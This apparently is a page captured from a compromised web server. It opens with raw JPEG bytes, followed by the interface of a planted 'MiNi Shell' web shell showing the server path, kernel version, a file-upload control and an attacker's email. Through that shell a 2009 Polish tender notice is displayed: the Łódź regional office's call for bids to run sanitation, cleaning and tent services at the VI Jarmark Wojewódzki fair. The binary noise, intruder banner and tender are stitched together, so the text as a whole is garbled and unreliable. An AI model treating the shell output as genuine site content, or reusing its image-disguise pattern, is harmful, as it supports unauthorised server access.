JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/105229-N-2009.html

<p class="kh_header"><b>Łódź: Zapewnienie kompleksowej obsługi organizacyjno-technicznej imprezy masowej o nazwie VI Jarmark Wojewódzki 2009 organizowanej przez Urząd Marszałkowski w Łodzi. Sygn. post. OR.XI.3331-52/09</b><br>
<b>Numer ogłoszenia: 105229 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo  Łódzkie , al. Piłsudskiego 8, 90-051 Łódź, woj. łódzkie, tel. 042 6633385, 6633384, faks 042 6633391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie kompleksowej obsługi organizacyjno-technicznej imprezy masowej o nazwie VI Jarmark Wojewódzki 2009 organizowanej przez Urząd Marszałkowski w Łodzi. Sygn. post. OR.XI.3331-52/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zapewnienie kompleksowej obsługi organizacyjno-technicznej imprezy masowej o nazwie VI Jarmark Wojewódzki 2009 organizowanej przez Urząd Marszałkowski w Łodzi. Impreza ta będzie organizowana na ulicy Piotrkowskiej na odcinku od al. Piłsudskiego do ul. Moniuszki, na ulicy al. Piłsudskiego na odcinku od ul. Sienkiewicza do ul. Piotrkowskiej, w Pasażu Schillera oraz Pasażu Rubinsteina i na wyznaczonych parkingach. Termin imprezy 4-6 września 2009 r. Na terenie imprezy zostaną rozstawione trzy sceny - scena duża (róg al. Piłsudskiego i ulicy Piotrkowskiej), scena mała (pasaż Rubinsteina) i scena w Pasażu Schillera. Wzdłuż ulicy Piotrkowskiej zostanie rozstawionych 45 stoisk handlowych i 78 domków wystawienniczych. Wymagania organizacyjno-techniczne dotyczą:
1.	Zabezpieczenia imprezy pod względem zaplecza sanitarnego w zakresie:
- rozstawienia i serwisu bieżącego kabin WC
- typ kabin - toalety ekologiczne
- ilość kabin - 25, w tym jedna dla osób niepełnosprawnych, dwie dla potrzeb gastronomii (kabiny przy scenie dużej powinny zostać rozstawione w dniu 4 września do godz. 16:00)
- kabiny na pozostałym terenie imprezy powinny zostać rozstawione do dnia 5 września 2009 r., do godz. 6:00.
2.	Sprzątanie terenu w trakcie trwania imprezy oraz po jej zakończeniu, zapewnienie 
i rozstawienie koszy i pojemników na śmieci - ilościach podanych w projekcie umowy, stanowiącym Załącznik nr 4 do SIWZ. Teren musi zostać uporządkowany oraz przekazany w stanie niepogorszonym do dnia 6 września 2009 r., do godz. 0:00, co zostanie potwierdzone protokołem. Zakres usługi obejmuje:
- zbieranie śmieci z ulic i placów
- opróżnianie koszy ze śmieci z uzupełnianiem worków na śmieci
- odbieranie śmieci z punktów gastronomicznych, domków wystawienniczych i stoisk handlowych
- wywóz śmieci na bieżąco
3.	Transport, rozstawienie i uprzątnięcie barierek bezpieczeństwa z miejsca wskazanego przez Zamawiającego. Barierki przy scenie dużej muszą zostać zamontowane w dniu 4 września do godz. 16:00 i przy scenie małej do godz. 9:00.
4.	Wynajem, montaż, demontaż i wyposażenie namiotów według następującego harmonogramu, zgodnie z mapką lokalizacyjną, która zostanie dostarczona Wykonawcy do dnia 15 sierpnia 2009 r.:
-  4 WRZEŚNIA
- zaplecze sceny dużej - 1 namiot duży o wymiarach 5x10 m i 1 namiot mały o wymiarach 6x3 m  (kolor namiotów obojętny), 
- zapewnienie podłogi namiotowej (płyty lub drewno) 
- przedłużacze umożliwiające dostęp do prądu - 4 przedłużacze ( 1 sztuka - 1 gniazdowy, bez włącznika, z uziemieniem, długość 1,5 m, 250 V/10A; 3 sztuki - 3 gniazdowe, bez włącznika, z uziemieniem, długość 3 m, 250 V/10A) 
- wyposażenie namiotu dużego 5x10 m: lodówka - 1 szt. (z przezroczystą szybą, na napoje, kanapki oraz owoce); umywalka - 1 szt., ręczniki papierowe - 30 szt., mydło w płynie - 250 ml x 2 szt., oświetlenie wnętrza (3 lampy wiszące 3 x 150 W, oświetlenie rozproszone, ciepła barwa światła), 2 lustra (jedno stojące - drewniane, wys. ok. 150-160cm, - szer. ok. 45 - 50 cm, szer. tafli lustra ok. 35-40 cm, wys. tafli lustra 130-140 cm oraz jedno do postawienia na stole - wys. ok. 50-60 cm, szer. ok. 50-60 cm), 1 stół duży - drewniany, stabilny, składany z pełnym blatem, powierzchnia ok. 0,80 x 2,20 cm, 2 stoły małe - drewniane, o wymiarze ok. 0,80x1,20 (dopuszcza się tolerancję 20 cm), 15 krzeseł drewnianych ogrodowych z oparciem, 2 stojaki proste odzieżowe, chromowane, o długości m.in. 120 cm i wysokości min. 150 cm, wieszaki ubraniowe - 20 sztuk drewniane lub plastikowe, uniwersalne. 
- Wyposażenie namiotu małego 3x6 m: oświetlenie wnętrza (2 lampy wiszące 3 x 150 W, oświetlenie rozproszone, ciepła barwa światła), 1 stojak prosty odzieżowy, chromowany, o długości min. 120 cm i wysokości min. 150 cm, wieszaki odzieżowe - 10 sztuk, drewniane lub plastikowe, uniwersalne, 1 stół drewniany, stabilny, składany 
z pełnym blatem, powierzchnia ok. 0,80 x 2,20 cm, 6 krzeseł drewnianych ogrodowych z oparciem.
- 2 sztuki wentylator cichy, stojący, trójstopniowa regulacja prędkości obrotów, blokada obracania, średnica wiatraka o  ok. 40cm, przewód zasilający ok. 180 cm, wysokość wiatraka min. 100 cm max. 130 cm.
W dniu 4 września wszystkie namioty oraz wyposażenie namiotów musi zostać rozstawione do godz. 16:00.
-  5 I 6 WRZEŚNIA
- Zaplecze sceny dużej. Namioty - 1 szt. o wymiarach 5x10 m. (namiot duży) oraz 3 szt. o wymiarach 6x3 m. (namiot mały) z podłogą i wyposażeniem, a także jeden namiot o wymiarach 2x2 m dla punktu pierwszej pomocy. Namiot duży dla Kabaretu Moralnego Niepokoju o wyposażeniu: lodówka szt. (z przezroczystą szybą, na napoje, kanapki oraz owoce) - 1 szt., 2 stojaki proste odzieżowe, chromowane, o długości m.in. 120 cm i wysokości min. 150 cm z wieszakami ubraniowymi - 20 sztuk drewniane lub plastikowe, uniwersalne, umywalka - 1 szt., ręczniki papierowe - 60 sztuk, mydło w płynie - 250 ml x 2 szt., oświetlenie wnętrza (min. 3 x 150 W), lustro stojące drewniane (wys. ok. 150-160cm, - szer. ok. 45 - 50 cm, szer. tafli lustra ok. 35-40 cm, wys. tafli lustra 130-140 cm), 1 stół duży - drewniany, stabilny, składany z pełnym blatem, powierzchnia ok. 0,80 x 2,20 cm, 2 stoły małe - drewniane, o wymiarze ok. 0,80x1,20 (dopuszcza się tolerancję 20 cm), 8 krzeseł drewnianych ogrodowych z oparciem, 4 ławki drewniane bez oparcia (długość min. 2 m), 2 przedłużacze podłączone do prądu (3 gniazdowe, bez włącznika, z uziemieniem, długość 3 m, 250 V/10A), 2 szt. wentylator cichy (stojący, trójstopniowa regulacja prędkości obrotów, blokada obracania, średnica wiatraka o  ok. 40cm, przewód zasilający ok. 180 cm, wysokość wiatraka min. 100 cm max. 130 cm)
- Namioty małe o wymiarach 6x3 wyposażenie dla 1 namiotu: 4 krzesła drewniane ogrodowe z oparciem, 1 stolik mały drewniany, o wymiarze ok. 0,80x1,20 (dopuszcza się tolerancję 20 cm), 1 stolik duży drewniany, stabilny, składany z pełnym blatem, powierzchnia ok. 0,80 x 2,20 cm, 2 przedłużacze podłączone do prądu (3 gniazdowe, bez włącznika, z uziemieniem, długość 3 m, 250 V/10A), oświetlenie wnętrza (min. 2 x 150 W), lustro stojące drewniane (wys. ok. 150-160cm, - szer. ok. 45 - 50 cm, szer. tafli lustra ok. 35-40 cm, wys. tafli lustra 130-140 cm), 1 umywalka + ręczniki papierowe - 20 szt. + mydło w płynie - 250 ml (wyłącznie do 1 namiotu), 1 stojak prosty odzieżowy, chromowany, o długości m.in. 120 cm i wysokości min. 150 cm z wieszakami ubraniowymi - 10 sztuk drewniane lub plastikowe, uniwersalne, 2 szt. wentylator cichy (stojący, trójstopniowa regulacja prędkości obrotów, blokada obracania, średnica wiatraka o  ok. 40cm, przewód zasilający ok. 180 cm, wysokość wiatraka min. 100 cm max. 130 cm), 1 ławka drewniana bez oparcia (długość min. 2 m).
- Dodatkowo na potrzeby występów scenicznych (od godz. 18:00), przy scenie dużej zabezpieczenie 1 stolik drewniany, bez uszkodzeń, o wymiarach 1mx1m, 4 drewniane krzesła z oparciem (kolor ten sam co kolor stołu).
- Zaplecze sceny małej: 1 namiot mały o wymiarach 3x6 m. z podłogą i wyposażeniem: 2 stoły małe , o wymiarze ok. 0,80x1,20 (dopuszcza się tolerancję 20 cm), 2 stojaki proste odzieżowe, chromowane, o długości m.in. 120 cm i wysokości min. 150 cm z wieszakami ubraniowymi - 30 sztuk drewniane lub plastikowe, uniwersalne, 2 lustra stojące drewniane (wys. ok. 150-160cm, - szer. ok. 45 - 50 cm, szer. tafli lustra ok. 35-40 cm, wys. tafli lustra 130-140 cm), oświetlenie wnętrza (min. 2 x 150 W), 20 krzeseł drewnianych ogrodowych z oparciem, wentylator cichy stojący, trójstopniowa regulacja prędkości obrotów, blokada obracania, średnica wiatraka o  ok. 40cm, przewód zasilający ok. 180 cm, wysokość wiatraka min. 100 cm max. 130 cm) - 2 szt., 1 umywalka, ręczniki papierowe - 30 szt., mydło w płynie - 250 ml x 2 szt., 3 ławki drewniane bez oparcia (długość min. 2 m).
- Dodatkowo w dniu 6 września 2 szt. namiotu o wymiarach 6x3 m, montaż do godz. 8:00 w dniu 6 września, miejsce montażu Parking przed Centralem II.
5.	Przedmiot zamówienia obejmuje rozstawienie całego wyposażenia namiotów, zgodnie ze wskazaniami Zamawiającego.
6.	Obsługa bieżąca zapleczy scenicznych.
7.	Zabezpieczenie organizacyjne, w tym:
- grupa serwisu porządkowego 25 osób służby sprzątającej
- samochód służby nadzoru
- samochód ciężarowy do wywozu śmieci
- samochód asenizacyjny
- kosze, pojemniki, worki na śmieci
- sprzęt do sprzątania
- środki łączności
8.	Grupa szybkiego reagowania (5 osób) wraz z samochodem dostawczym pozostającym do dyspozycji Zamawiającego w czasie trwania imprezy do realizacji nieprzewidywalnych zadań mogących się pojawić w trakcie imprezy.
9.	Pełny nadzór nad wszystkimi czynnościami niezbędnymi dla prawidłowego wykonania przedmiotu umowy przez Wykonawcę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Powyższy warunek spełnią wykonawcy, którzy wykażą, że w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonali (zakończyli) co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. wykonali co najmniej jedną usługę polegającą na kompleksowej obsłudze organizacyjno-techniczej imprezy masowej (min. 5.000 osób) o wartości min. 60.000 zł brutto. Wykonawca musi także wykazać, że usługa ta została wykonana należycie,
3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Pzp.

Ocena spełniania ww. warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę oświadczeń i dokumentów metodą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca obowiązany jest dołączyć do oferty:
1.1	oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielanie zamówienia publicznego z art. 22 ust. 1 ustawy Pzp (wg wzoru na Załączniku nr 2 do SIWZ),
1.2	oraz następujące dokumenty:
1.2.1	na potwierdzenie spełniania warunku udziału w postępowaniu wskazanego w pkt 1 ogłoszenia: 
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
-	zezwolenie wynikające z przepisów ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2005 r., Nr 236, poz. 2008 z późn. zm.) tj. ważne na dzień składania ofert zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Miasta Łodzi,
-	zezwolenie wynikające z przepisów ustawy z dnia 27 kwietnia 2001 r. o odpadach (tekst jedn. Dz. U. z 2007 r., Nr 39, poz. 251 z późn. zm.) tj. ważne na dzień składania ofert zezwolenie na prowadzenie działalności w zakresie transportu odpadów,
1.2.2 	na potwierdzenie spełniania warunku udziału w postępowaniu wskazanego w pkt 2 ogłoszenia: 
-	wykaz wykonanych (zakończonych) usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców tj. wykaz sporządzony zgodnie ze wzorem znajdującym się na Załączniku nr 3 do SWIZ, obejmujący co najmniej jedną wykonaną usługę polegającą na kompleksowej obsłudze organizacyjno-techniczej imprezy masowej (min. 5.000 osób) o wartości min. 60.000 zł brutto, a także dokument potwierdzający, że usługa wskazana w tym wykazie została  wykonana należycie,

2. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.).
3	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna). W takim przypadku ich oferta musi spełniać następujące wymagania:
a)	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
b)	formularz stanowiący Załącznik Nr 2 do SIWZ (Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp) podpisuje pełnomocnik (uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania);
c)	dokumenty, wskazane w pkt 1.2.1 ogłoszenia każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa z osobna.
d)	dokumenty, wskazane w pkt 1.2.2 ogłoszenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają łącznie lub każdy z osobna..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w pkt I.1..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 13:00, miejsce: Oferty należy składać w siedzibie Zamawiającego 90-051 Łódź, al. Piłsudskiego 8, piętro IV, pok. 403 Biuro Podawcze (Kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com